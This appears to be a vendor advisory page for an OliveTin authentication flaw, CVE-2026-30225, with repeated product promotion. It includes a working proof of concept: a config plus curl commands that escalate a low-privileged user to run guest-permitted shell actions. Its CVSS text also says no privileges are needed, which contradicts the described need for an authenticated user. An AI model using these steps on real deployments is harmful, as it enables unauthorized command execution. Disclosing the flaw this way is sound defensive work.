CVE-2026-30225

CVE-2026-30225 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260305000458-cb46a597b246. It is fixed in 0.0.0-20260305000458-cb46a597b246.

Summary

An authentication context confusion vulnerability in RestartAction allows a low‑privileged authenticated user to execute actions they are not permitted to run.

RestartAction constructs a new internal connect.Request without preserving the original caller’s authentication headers or cookies. When this synthetic request is passed to StartAction, the authentication resolver falls back to the guest user. If the guest account has broader permissions than the authenticated caller, this results in privilege escalation and unauthorized command execution.

This vulnerability allows a low‑privileged authenticated user to bypass ACL restrictions and execute arbitrary configured shell actions.

Details

Affected files:

service/internal/api/api.go

service/internal/auth/authcheck.go

Relevant code in RestartAction:

return api.StartAction(ctx, &connect.Request[apiv1.StartActionRequest]{
    Msg: &apiv1.StartActionRequest{
        BindingId:        execReqLogEntry.GetBindingId(),
        UniqueTrackingId: req.Msg.ExecutionTrackingId,
    },
})

Authentication in StartAction:

authenticatedUser := auth.UserFromApiCall(ctx, req, api.cfg)

Issue:

  1. RestartAction creates a new connect.Request object.

  2. The new request does not preserve caller headers or cookies.

  3. UserFromApiCall() attempts to resolve the user from the request.

  4. Because authentication headers are missing, it falls back to the guest user.

  5. If guest.exec = true while the original caller has exec = false, the action executes with elevated privileges.
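The five steps above reduced to a runnable Go model, added here as an example that is not OliveTin's own code: a session cookie resolves the caller, a rebuilt request that carries no headers resolves to guest, and forwarding the original headers (one illustrative fix, assumed here rather than taken from the upstream patch) restores the caller's ACL decision. `User`, `Config`, `Request` and the function names are constructed stand-ins for the project's types.

```go
package main

import "net/http"

// Constructed model of the advisory's bug; not OliveTin's own code.
type User struct {
	Name string
	Exec bool
}

// Config maps a full Cookie header value to its user; Guest is the fallback.
type Config struct {
	Sessions map[string]User
	Guest    User
}

// Request stands in for connect.Request: the message plus the caller's headers.
type Request struct {
	ActionID string
	Header   http.Header
}

// userFromRequest models auth.UserFromApiCall: resolve the caller from the
// Cookie header, otherwise fall back to guest (a nil Header simply yields "").
func userFromRequest(req *Request, cfg *Config) User {
	if u, ok := cfg.Sessions[req.Header.Get("Cookie")]; ok {
		return u
	}
	return cfg.Guest
}

// startAction returns the user the ACL check ran as and whether it allowed exec.
func startAction(req *Request, cfg *Config) (User, bool) {
	u := userFromRequest(req, cfg)
	return u, u.Exec
}

// restartVulnerable rebuilds the request without the caller's headers, so the
// check in startAction resolves to guest (the advisory's bug).
func restartVulnerable(orig *Request, cfg *Config) (User, bool) {
	return startAction(&Request{ActionID: orig.ActionID}, cfg)
}

// restartFixed forwards the caller's headers into the synthetic request. This is
// an illustrative fix, not the upstream patch; passing the already-resolved
// user down to the action runner would close the same gap.
func restartFixed(orig *Request, cfg *Config) (User, bool) {
	return startAction(&Request{ActionID: orig.ActionID, Header: orig.Header.Clone()}, cfg)
}
```

With the advisory's configuration (low has exec false, guest has exec true) the direct call is denied, the vulnerable restart runs as guest and is allowed, and the fixed restart is denied again.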

PoC

Configuration:

defaultPermissions:
  exec: false

users:
  - username: low
    password: lowpass
    permissions:
      exec: false

  - username: guest
    permissions:
      exec: true

actions:
  - id: restart_bypass_action
    shell: |
      echo "pwned" > /tmp/olivetin_restart_bypass.txt

Steps to reproduce:

Log in as the low user:

LOW_LOGIN=$(curl -sS -i -X POST \
  http://localhost:1337/olivetin.api.v1.OliveTinApiService/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

LOW_SID=$(printf '%s\n' "$LOW_LOGIN" | tr -d '\r' | \
  awk -F'[=;]' '/^Set-Cookie: olivetin-sid-local=/{print $2; exit}')

Attempt direct execution (correctly blocked):

LOW_RUN=$(curl -sS -X POST \
  http://localhost:1337/olivetin.api.v1.OliveTinApiService/StartActionAndWait \
  -H 'Content-Type: application/json' \
  -H "Cookie: olivetin-sid-local=$LOW_SID" \
  -d '{"actionId":"restart_bypass_action"}')

echo "$LOW_RUN"

This should return permission denied.

Extract executionTrackingId from response:

TRACKING_ID=$(printf '%s' "$LOW_RUN" | \
  sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p' | head -n1)

echo "Tracking ID: $TRACKING_ID"

Call RestartAction:

curl -sS -X POST \
  http://localhost:1337/olivetin.api.v1.OliveTinApiService/RestartAction \
  -H 'Content-Type: application/json' \
  -H "Cookie: olivetin-sid-local=$LOW_SID" \
  -d "{\"executionTrackingId\":\"$TRACKING_ID\"}"

Verify command executed:

cat /tmp/olivetin_restart_bypass.txt

Output:

pwned

Impact

  • Privilege Escalation
  • ACL Bypass
  • Unauthorized Command Execution

Any authenticated low-privilege user can execute actions they are not authorized to run if:

  • Guest has broader permissions
  • RestartAction is enabled

Because OliveTin actions execute system shell commands, this can lead to:

  • Arbitrary file writes
  • Sensitive data exposure
  • Potential full host compromise (depending on OliveTin runtime privileges)

This affects all deployments where:

  • guest.exec = true
  • A restricted user has exec = false
  • RestartAction endpoint is accessible

CVE-2026-30225 has a CVSS score of 5.3 (Medium). The vector is network-reachable, requires no privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260305000458-cb46a597b246); upgrading removes the vulnerable code path.

Affected versions

github.com/OliveTin/OliveTin (< 0.0.0-20260305000458-cb46a597b246)

Security releases

github.com/OliveTin/OliveTin → 0.0.0-20260305000458-cb46a597b246 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260305000458-cb46a597b246 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30225? CVE-2026-30225 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260305000458-cb46a597b246. It is fixed in 0.0.0-20260305000458-cb46a597b246.
  2. How severe is CVE-2026-30225? CVE-2026-30225 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-30225? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260305000458-cb46a597b246 are affected.
  4. Is there a fix for CVE-2026-30225? Yes. CVE-2026-30225 is fixed in 0.0.0-20260305000458-cb46a597b246. Upgrade to this version or later.
  5. Is CVE-2026-30225 exploitable, and should I be worried? Whether CVE-2026-30225 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-30225 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-30225? Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260305000458-cb46a597b246 or later.
